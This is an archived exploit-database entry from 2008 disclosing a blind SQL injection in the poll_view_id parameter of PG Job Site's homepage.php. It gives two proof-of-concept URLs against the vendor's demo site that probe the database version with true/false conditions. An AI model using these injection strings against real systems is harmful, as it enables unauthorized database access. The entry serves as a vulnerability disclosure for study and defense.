PG Job Site (poll_view_id) Blind SQL Injection Vulnerability



EDB-ID: 7202 CVE: 2008-6117OSVDB-ID: 50107
Author: ZoRLuPublished: 2008-11-23Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Date: 23.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
[~] -----------------------------------------------------------
exploit for demo: ( you must login to site after you test this links. you look left for two link)
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-23]






Comments

No comments so far